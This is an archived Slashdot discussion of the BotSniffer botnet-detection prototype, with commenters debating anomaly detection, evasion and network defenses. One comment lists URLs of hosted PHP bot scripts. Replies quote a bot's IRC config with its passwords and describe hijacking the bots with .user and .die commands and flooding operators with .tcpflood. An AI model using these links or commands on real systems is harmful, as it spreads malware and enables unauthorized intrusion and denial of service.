Slashdot Mirror

← Back to Stories (view on slashdot.org)

Prototype Software Sniffs Out, Disrupts Botnets

Posted by Zonk on from the are-you-john-connors dept.

coondoggie writes "Earlier this week researchers unveiled a system to identify and eradicate botnets in the wild. While currently only a prototype, Georgia Tech's BotSniffer would use network-based anomaly detection to identify botnet command and control channels in a LAN. The system wouldn't require any prior knowledge of signatures or server addresses. 'The researchers said their prototype, which was presented at the Internet Society's Network and Distributed System Security Symposium this week, is based on the fact that botnets engage in coordinated communication, propagation, and attack and fraudulent activities.'"

51 comments

  1. Does it detect torrents? by imbaczek · · Score: 2, Interesting

    I can see RIAA and friends going green with envy if it worked.

  2. way easier idea by ILuvRamen · · Score: 3, Informative

    We don't need AI and network scanners and blah blah blah. It's crazy easy to detect just by the traffic patterns and amount of data sent if a computer is infected. So ISPs detect everyone that sent data to known botnet targets or controllers and disconnect that customer until they disinfect themselves. Then everyone will be convinced to practice better overall security and they won't crack down on p2p as much because botnet traffic will no longer bog down entire ISP networks and I'll have lots of business as a computer repairer :-P it's the perfect idea really.

    --
    Google's Super Secret Search Algorithm: SELECT @search_results FROM internet WHERE @search_results = 'good'
    1. Re:way easier idea by Anonymous Coward · · Score: 1, Interesting

      My college had this policy when I was an undergrad. They used it on a Windows box I didn't care much about since I only used it to play movies on my TV. It was enough to keep me from ever using Windows again. I'd wager that most people would come up with more temporary solutions (changing ISPs, buying a new computer, etc.). One can always dream, though.

    2. Re:way easier idea by Anonymous Coward · · Score: 0
      The hell? How did the parent get modded informative?!

      He wrote:

      We don't need AI and network scanners and blah blah blah. It's crazy easy to detect just by the traffic patterns and amount of data sent if a computer is infected.


      and

      botnet traffic will no longer bog down entire ISP networks


      I know this is slashdot, but did you read the article (or have any preexisting knowledge about botnets before posting this?

      See in TFA:

      Georgia Tech's BotSniffer uses network-based anomaly detection to identify botnet command and control channels in a local area network without any prior knowledge of signatures or server addresses, the researchers said.


      and

      Botnet command and control traffic, which often uses Internet Relay Chat (IRC) or HTTP protocols, is difficult to detect because it follows normal protocol usage and is similar to normal network traffic. Botnet traffic volume is low as well and may contain encrypted communication, adding to the difficulty, researchers said.


      FFS, if detecting botnet traffic was really "crazy easy"... don't you think it would have been figured out a long time ago?
    3. Re:way easier idea by Anonymous Coward · · Score: 0

      FFS, if detecting botnet traffic was really "crazy easy"... don't you think it would have been figured out a long time ago? It has been, repeatedly. Every time a new botnet is deployed it has to be identified by traffic patterns, as stated. It takes less than a day usually, which I'd say qualifies as quickly & even "crazy easy" but still takes time. Automating that would save time for more productive uses. Yay!
    4. Re:way easier idea by ILuvRamen · · Score: 1

      what planet do you live on? Spam takes up such a huge amount of all internet traffic, they thought it was going to crash the entire internet at the current rate of increase just a few years ago. Wasn't it like half of all traffic or something? And like 90% of spam is sent by botnet comps.

      --
      Google's Super Secret Search Algorithm: SELECT @search_results FROM internet WHERE @search_results = 'good'
    5. Re:way easier idea by Anonymous Coward · · Score: 0

      Spam takes up such a huge amount of all internet traffic


      Internet traffic != email traffic
    6. Re:way easier idea by Anonymous Coward · · Score: 0

      This is fantastic. Not only do you not read the fucking article, but you don't even read the fucking comment to which you are replying.

      For the record, the article states, in part, "Botnet traffic volume is low [...], researchers said."

      And, yet, your response is, "what[sic] planet do you live on?" And then later, "And like 90% of spam is sent by botnet comps[sic]."

      So... I don't know. Should I listen to researchers at Georgia Tech? Or should I listen to a random guy on slashdot who cannot even grasp the basic rules[*] of the grammar of the human language he uses to communicate to his fellow (presumed) humans?

      * - In English, words which begin a sentence are capitalized. Also, English sentences have a subject.

  3. Prior art ... by tomhudson · · Score: 3, Funny

    I can see RIAA and friends going green with envy if it worked.

    Won't happen ... From the summary:

    is based on the fact that botnets engage in coordinated communication, propagation, and attack and fraudulent activities

    The RIAA / MPAA / Congresscritters / Lobbyists / Subprime Lenders ? BushCheneyHalliburtonCo all claim prior art ...

  4. Useful but fundamentally flawed.... by DigitalisAkujin · · Score: 4, Interesting

    This will work for plain text IRC connections but what if the bot is on an encrypted IRC connection?

    While this is a step in the right direction it will be out maneuvered quickly.

    1. Re:Useful but fundamentally flawed.... by Anonymous Coward · · Score: 4, Informative

      Don't be so quick to say that it won't work. We don't have enough information as to how it is designed and you don't understand anomaly based detection works. The idea behind network anomaly based detections is to identify communication between two or more host that aren't supposed to exist or that didn't in the past. That is the 5 cents explanation of it.

    2. Re:Useful but fundamentally flawed.... by TubeSteak · · Score: 4, Insightful

      "For instance, at a similar time, the bots within a botnet will execute the same command -- obtain system information, scan the network -- and report to the command and control server with the progress/result of the task. Normal network activities are unlikely to demonstrate such a synchronized or correlated behavior." That is why it won't matter if the botnet is using encrypted communications or not.

      Unfortunately, it wouldn't be much of a challenge to institute a randomized delay between receiving commands, executing them, and reporting back to the C&C. The C&C could even change the randomization factor depending on how many bots are in that specific subnet of IPs. More bots = more time delay to thwart the sniffer.
      --
      [Fuck Beta]
      o0t!
    3. Re:Useful but fundamentally flawed.... by Professr3 · · Score: 5, Informative

      The very nature of botnet activities usually requires a coordinated effort. You can't DDOS a website with randomly-delayed attacks from each host, because then it wouldn't be a DDOS, just a slower increase in traffic. Spam campaigns usually only work for the first few minutes before services catch on, and then that particular spam campaign is over. Unless all the bots participate reasonably simultaneously, they can't accomplish their goals as well.

    4. Re:Useful but fundamentally flawed.... by kvezach · · Score: 3, Interesting

      This will work for plain text IRC connections but what if the bot is on an encrypted IRC connection?

      Or Achord for that matter. If the botnet is based on a peer to peer structure and the author has added public-key encryption, all he has to do is connect to an arbitrary bot host and insert the (signed) command which propagates through the network to all the other nodes; there'll be no fixed master server to home in on.
    5. Re:Useful but fundamentally flawed.... by eonlabs · · Score: 4, Interesting

      This brings me to several questions:

      What happens if a new host, or several new hosts are added to the network?
      What happens if this is a public wifi where new hosts are added and dropped all the time?

      If the functionality is as described in the article summary and it looks for coordinated communications, how will it interpret bittorrent style communications where a lot of different computers, some possibly infected, most not, transferring data to and from a single host trying to download?

      It sounds like swarming algorithms are the kind of behavior it would be looking for.
      Just thinking out loud...

      --
      I wouldn't consider the mad hatter mad. Just reality impaired. He sure can make a mean cup of tea.
    6. Re:Useful but fundamentally flawed.... by irc.goatse.cx+troll · · Score: 1

      Obviously the solution is to legislate against internet terrorist tools like IRC encryption.

      Really though, I don't think they're just grepping for .udpflood here, that would not be news. What I gut from the summary was that they were using anomaly detection to see for example that 25 hosts all started sending mass data after having a communication with one ip. Doesn't matter whats in that connection, it at least gives you somewhere to start.

      --
      Pain lasts, kid. Its how you know you're alive. Sometimes I think this growing up thing is just pain management-TheMaxx
    7. Re:Useful but fundamentally flawed.... by somersault · · Score: 2, Funny

      I knew there was something evil about our WSUS server

      --
      which is totally what she said
    8. Re:Useful but fundamentally flawed.... by TubeSteak · · Score: 2, Interesting

      You can't DDOS a website with randomly-delayed attacks from each host, because then it wouldn't be a DDOS, just a slower increase in traffic. On average, Botnets are no longer hundreds or thousands strong, they've grown into the tens of thousands...
      As an exceptional case, F-Secure claims Storm is a million strong.

      Do you really need tens/hundreds of thousands of bots attacking all at once? Even if the answer to that question is yes, the bots are still polled for status & told to fetch updates. Introducing a randomized delay will certainly help hide non-attack behavior, which will undoubtedly prolong the life of the botnet.

      However, with a million bots, you could easily afford to randomize attack behavior. If TFA's technology spreads, botnets may have to have 3*X bots spitting out data randomly instead of X bots attacking instantly with 100% of their bandwidth in an easily discerned pattern. How else do you propose to defeat a sniffer looking for patterns in the network traffic?
      --
      [Fuck Beta]
      o0t!
    9. Re:Useful but fundamentally flawed.... by Anonymous Coward · · Score: 0

      The idea behind network anomaly based detections is to identify communication between two or more host that aren't supposed to exist or that didn't in the past. That is the 5 cents explanation of it.

      Oh yea, that's the 5 cents explanation of a firewall too. In reality it means having a dialog box pop up at your once every 5 minutes. So figure out of svchost needs to access port 2096 at IP a.b.c.d.

      Also coordinated action is not exactly "evil" all the time. I wonder what happens to P2P networks, torrents, distributed projects like folding-at-home.

      Maybe the user can whitelist those apps? Well then so can the trojan.

      Seems like we're looking at another huge pile of dialog boxes at some point in this algorithm again, aren't we.

    10. Re:Useful but fundamentally flawed.... by gr8scot · · Score: 1

      Unfortunately, it wouldn't be much of a challenge to institute a randomized delay between receiving commands, executing them, and reporting back to the C&C. The C&C could even change the randomization factor depending on how many bots are in that specific subnet of IPs. More bots = more time delay to thwart the sniffer. That's why I think these kinds of reports should be available only in pay-per-view journals and university CS/engineering departments.
      --
      All 19 hijackers were known terrorists 09-10-2001. Lack of FBI intelligence does not justify warrantless wiretaps..
    11. Re:Useful but fundamentally flawed.... by Kent+Recal · · Score: 1

      And, just to add another datapoint, it wouldn't be hard to synchronize the bots to a common timesource
      and simply schedule your attack in advance. Think CronBot(tm).

    12. Re:Useful but fundamentally flawed.... by Dextrously · · Score: 1

      This could end up making life easier on the ring leaders of most botnets. The two purposes I generally see these botnets used for when I worked at a data center were generally to nuke a host offline, or slowly and subtly raise the average bandwidth of a host thereby incurring extreme monthly bandwidth charges to them. Generally, they will extort money from the victim by these means.

      Say that this technology is tricked into believing that uninvolved host "X" is part of a botnet; now host "X" is effectively knocked off line or hassled into some troubling TOS issue with their provider due to suspected illegal activity. Mission accomplished for the botnet owners.

      It really depends on how it "disrupts" the botnet. The article doesn't clearly state how this is done.

    13. Re:Useful but fundamentally flawed.... by ultranova · · Score: 2, Interesting

      What I gut from the summary was that they were using anomaly detection to see for example that 25 hosts all started sending mass data after having a communication with one ip.

      Unless, of course, they got their instructions in an e-mail. Spam is already semi-randomized to get past filters, so it wouldn't be hard to have it carry encoded instructions too.

      Or have them use instant messaging. The zombie worm should detect which IM program the user uses, and send a message to the control (or one of various fake identities) using that, so the control knows to send messages back using it as well.

      Heck, you could have a two-part worm which infects both Web servers and desktops. An infected desktop infects any server it contacts, and an infected server infects any desktop which contacts it. If the server and desktop are both already infected, they pass whatever new messages (commands) they have to each other.

      You can get around anomaly detection by not causing any anomalies. Piggypack your messages on already existing connections rather than starting new ones. Basic spy stuff, really.

      --

      Forget magic. Any technology distinguishable from divine power is insufficiently advanced.

  5. applications of abstract theory you say? by machine+of+god · · Score: 1

    It just occurred to me that there is going to be a point in this arms race where I am going to be interested enough to want to participate. Now how do I go about bringing myself up to speed on the subject I wonder.

  6. Even easier way ... . by Anonymous Coward · · Score: 5, Interesting

    Just run a web server where you allow things like .. .

        index.php?main=xxx

    and then watch the attempts that come in for xxx, they will
    all be scripts that trigger the botnets. grab the scripts
    and you have the irc server, the channel, etc.

    A recent one that I saw was one katana.webchat.org in channel
    #msdos -- no idea if it is still running (ironic since webchat
    is supposed to have a security team). I reported it, but never
    heard anything back).

    Here are a bunch of other ones, access to botnets, free of
    charge.

    http://www.forestfamily.org/garc/.php/meifase.txt
    http://bialoka123.fileave.com/script9.txt
    http://raptortx.googlepages.com/inc3.txt
    http://snock.host.sk/spread.txt
    http://bialoka123.fileave.com/script9.txt
    http://members.lycos.co.uk/enviescraps/pbot.txt
    http://gikowns.googlepages.com/BOTNET-GIKO.txt
    http://www.ligseg.com.br/Etc/24.gif
    http://76.162.170.34/Photos/pbot
    http://www.hotjazz.xpg.com.br/ty.txt

    Use at your own risk, and maybe, these folks will get off their rear ends and shut these things down.

    1. Re:Even easier way ... . by 0100010001010011 · · Score: 2, Interesting

      ROFL this is tons of fun.

      I just took over a bot net. Read the source code and figured out what's going on how to login to them. Man these things are semi-complex.

      I just took over one and killed it. Dude was none to happy:
      16:20 macacao> l3
      16:21 macacao> SE EU TE PEGO
      16:21 macacao> EU VO CUMER
      16:21 macacao> TEU CU
      16:21 macacao> FILHO DA PUTA

    2. Re:Even easier way ... . by 0100010001010011 · · Score: 2, Interesting

      Because script kiddies are getting lazier and lazier.

      All the ones I was messing with were the php ones that had a config file like this:
      --
      var $config = array("server"=>"katana.webchat.org",
                                                "port"=>6667,
                                                "pass"=>"", //senha do server
                                                "prefix"=>"L",
                                                "maxrand"=>8,
                                                "chan"=>"#samera",
                                                "key"=>"fucked", //senha do canal
                                                "modes"=>"+p",
                                                "password"=>"ts", //senha do bot
                                                "trigger"=>".",
                                                "hostauth"=>"*" // * for any hostname
                                                );
      --
      And now that I went back and refreshed, they changed the channel and password.

      The commands aren't too difficult, they're in the header of a few other files that are linked in the original post. Just make sure that you have all your commands queued up and copy and paste them in at once. I didn't and the original bot owner took control and had them all die :-P

      I rewrote the script so that instead of actually doing the commands it just logs what it should have done and returns a positive response to the channel. So far I have a few UDP floods, I think I'll observe these guys for a while. Should be some entertainment for Saturday night.

    3. Re:Even easier way ... . by Anonymous Coward · · Score: 0

      I have not seen where you can "take it over", but yu can make life hell for the "owners"

      Login, it is best to use the criteria that they are expecting victims to log in as, to prevent early detection.

      then you start issuing . commands, first off the .user command with the password in the TXT file will get you authorized, then you can issue other . commands . ..like .die to kill all the bots.

      Even more gratifying would be to kill all the Ops in the channel by .tcpflood-ing them. Then .die the rest of the bots and try to take over the channel. this would be hard to do, but is worth a try.

      Your other option to shut down the botnet is to simply .tcpflood the IRC server and port that the botnet is using.

    4. Re:Even easier way ... . by 0100010001010011 · · Score: 2, Informative

      Yes, that's what I was showing they accept authentication from ANYONE. .user and i'm in.

      And all these idiots did was ban my *!user@host. I reconnected via irssi after changing my username and I got back in. I'm trying to script up something entertaining but sadly the IRC server masks host names :(. They already uploaded and made changes to the original link, I wonder if they have any idea their config file bookmarked on Slashdot.

    5. Re:Even easier way ... . by MikeS2k · · Score: 1

      http://gikowns.googlepages.com/BOTNET-GIKO.txt

      I'm now in one particular channel on Quakenet, and it'll only let you issue the .user command (or indeed any other command) if your hostname matches that in the config - this one in particular will only accept "Giko.users.quakenet.org" as the hostname.

      I tried to login to his Quakenet account, but alas, the password doesn't match the one he chose for his bot's authpass :-(

      The channel had about 7 bots anyhow, so either he's moved them along or just isn't very lucky ;)

      --
      120 characters should be enough for anybody
  7. They need to think about this... by twotailakitsune · · Score: 1

    BotSniffer, can capture network command and control protocols and utilize statistical algorithms to detect botnets. So it uses signatures.

    identify botnet command and control channels in a local area network. so you can't have a 10,000 botnet on a LAN.... Not that I would like some ISP to use this. Now some guy at Comcast will "fight the evil botnets". BotSniffer sounds like a kill the massage-girl thing.

    has a very low false positive rate So, what about when BotSniffer shutdowns things that are not an "evil botnet"? (IRC, ...)

    Normal network activities are unlikely to demonstrate such a synchronized or correlated behavior. A lot of automatic network activities are vary correlated.

    I know complaining over nothing.

    1. Re:They need to think about this... by Anonymous Coward · · Score: 0

      Wow you're stupid. Please never post again.

  8. Will it stop BitTorrent? by Anonymous Coward · · Score: 5, Insightful

    At the traffic level, BitTorrent looks a lot like a bot net. It has a central controllers (the tracker) and makes random connections to other peers, which then trade large amounts of data.

    So would this kill BitTorrent? I've heard network security people explain how peer-to-peer technologies are a dead end because they're impossible to run on a secure network since they do look like botnets. How does this deal with that?

    1. Re:Will it stop BitTorrent? by Anonymous Coward · · Score: 0

      Well the amount of data exchanged through bittorrent has surely a different symmetry than a botnet intent in DDOSsing a website or sending spam. If botnets nodes talk to each other only, too bad for the compromised nodes, but for the rest of the net is not so big an issue. my 2c.

    2. Re:Will it stop BitTorrent? by Anonymous Coward · · Score: 0

      They're only looking for IRC traffic (they mention HTTP, but I believe that's only for remote page inclusion -- ie: pbot). After that, they're looking for patterns in protocol-specific traffic.

      SSL connections will ruin the entire thing, unless they are relying on watching outbound traffic too.

      I don't see what's so new or inventive about this.

  9. Botnets are easy to detect and control by colinmcnamara · · Score: 5, Informative
    Botnets are easy to detect and control. The problem is that the majority of organizations have not taken the steps to stop both their communication and control channels, and their ability to launch attacks. What should everybody do ?

    1. Deny IRC traffic at your firewalls. If there is a business need for IRC then setup a IRC proxy, or inline authentication. This simple step will stop many of the bots out there from phoning home.

    2. Enable reverse path detection on your network devices. This forces your internal routers to check whether the source ip address that the bot is sending, is available out the interface that your comprimised host exists on.

    3. Enable DHCP snooping on your edge switches. By configuring this feature the switchport that your host plugs into passively observes what IP address was given to your computer. If traffic is spoofed (a common occurrence for botnets) the switchport effectively shuts your host down.

    4. Monitor your network. There many free and commercial products that will make it clear that your traffic profiles have changed. Some good free tools for this are Cacti - http://www.cacti.net/, Nagios - http://www.nagios.org/ and NTOP - http://www.ntop.org/

    5. Utilize update antivirus technology, hopefully one that reports to a central console. These are simple steps, that frankly most people do not use in their networks. If they would the botnet issue would be greatly minimized.

    --
    Colin McNamara - CCIE #18233 "The difficult we do immediately, the impossible just takes a little longer"
  10. It Has To Be Said by Hawkeye05 · · Score: 1

    By the time Skynet became self-aware it had spread into millions of computer servers across the planet. Ordinary computers in office buildings, dorm rooms; everywhere. It was software; in cyberspace. There was no system core; it could not be shutdown. The attack began at 6:18 PM, just as he said it would. Judgment Day, the day the human race was almost destroyed by the weapons they'd built to protect themselves. I should have realized it was never our destiny to stop Judgment Day, it was merely to survive it, together. The Terminator knew; he tried to tell us, but I didn't want to hear it. Maybe the future has been written. I don't know; all I know is what the Terminator taught me; never stop fighting. And I never will. The battle has just begun.

    Any Similarities?

    --
    Http://Stineomite.org (Yeah Thats Right I'm An Organization)
    1. Re:It Has To Be Said by Lobster+Quadrille · · Score: 1

      Any Similarities? Not really, no.
      --
      "The cup is in turn designed for holding hot or cold liquids, and has an open rim and closed base." --US Patent #5425497
  11. Comment removed by account_deleted · · Score: 1

    Comment removed based on user account deletion

  12. Re:shitty idea by Anonymous Coward · · Score: 0

    You obviously don't understand what anomaly detection is. If you don't know about a subject, shut the fuck up and stop trying to comment okay?

  13. let me get this botnet thing right by Anonymous Coward · · Score: 0

    let me get this right. bots in the net routinely connect to a C&C server and then execute identical commands...

    so just like the MSAutoUpdate? I like the direction this could go!!!

  14. Comment removed by account_deleted · · Score: 3, Interesting

    Comment removed based on user account deletion

  15. Comment removed by account_deleted · · Score: 1

    Comment removed based on user account deletion

  16. It's an arms race by vinn01 · · Score: 3, Insightful


    The system as described shows promise. The current crop of botnet software all exhibit a behavior pattern that can be detected.

    Of course there's been other attempts at botnet detection software, but network deployment has been sparse. Deployment is key. Maybe Georgia Tech's good name will help get it deployed. It has be be proved useful to the large network operators or it will never spread beyond a few test systems.

    The network operators have to want this detection software enough to deploy and maintain it. It has to help their bottom line. Then it can be developed beyond a university research prototype.

    Will the bad guys update the botnet software to out maneuver the good guys? You can bet on it. But keep in mind that the the people who developed the botnet software generally are generally not the same ones who operate the largest botnets. The botnet operators will be greatly impacted until they can get updated software and then get it deployed.

    This system will cause a botnot disruption that will take time to rebuild. Then, the botnet detection software will need to be updated. And the arms race will continue...

    1. Re:It's an arms race by smellotron · · Score: 1

      The network operators have to want this detection software enough to deploy and maintain it. It has to help their bottom line. Then it can be developed beyond a university research prototype.

      It does help the bottom line of last-hop ISPs. If 50% of your network traffic is from virus-infected computers, you can double your effective capacity with perfect virus detection and quarantine. It also provides a pretty strong encouragement for users to get their computers fixed, since a virus means "no internet" rather than "slow internet".

      Obviously, detection isn't perfect, and there's some point where the the cumulative cost of maintenance, false positives (support calls and subscription cancellation from angry customers), and false negatives (bandwidth cost for the viral traffic) goes too high. If the quality is below some point, it will just be a net financial burden. But I know at least one ISP that has used virus quarantining to good effect.

  17. Better takedown, not DPI by Mark(ATL) · · Score: 2, Insightful

    The problem is not one of identification, it is very easy to detect members of a botnet without resorting to Deep Packet Inspection everywhere. The main problem is lack of local laws and regulation, and varying degree's of takedown management.

  18. Make your network Botnet resistant by Yoshimetso · · Score: 1

    1) Deploy network IPS 2) Deploy HIPS 3) Deploy Anti virus solution (symantec, kaspersky, trend micro) 4) Firewall Rules 5) Windows WSUS (updates) 6) Switch IDS cards (Cisco) 7) Sniff and monitor high traffic utilization 8) Internet Content filtering (ex. WebSense + the advanced protection option to filter requests to infected hosts) 9) Good Anti Spam solution (ex. Borderware MXstream) 10) Educate users ExtremeSecurity Blog Admin http://extremesecurity.blogspot.com/

  19. Time for a Paradigm Shift? by mac_mcgrew · · Score: 1

    Perhaps what I have to say is oversimplifying or ignorant. But I'm sure the nice people here at Slashdot will be more than willing to educate me.

    The more I watch this issue, the more it seems clear to me that a losing battle is being fought. I picture an analogous world where, by default, houses are constructed with multiple doors that open to the outside world. And also by default, the doors are not locked. To make matters worse, the locks on the doors aren't visible. So even after a door has been secured, the owner can't be sure if it really is secure other than to try to open it. Isn't this the computing world we live in now?

    I imagine that when the current mainstream operating systems were conceived the architects didn't imagine thousands of attackers, script kiddies and zombies knocking on their "doors". But that was a different time. It seems to me that the true solution to this issue, and many others, is a paradigm shift. It seems that we really need an OS that is built from the ground up with a stronger sense of security. Perhaps an OS that requires interaction from the user to enable communication with others.

    By no means have I laid out a full plan for such a system. I don't know...I almost feel silly now that I see this in writing. But it seems to me that all we're doing now is applying band-aids to a design that didn't take our current computing environment into account.

    --
    If it ain't made of shiny plastic building bricks, I'm only partially interested.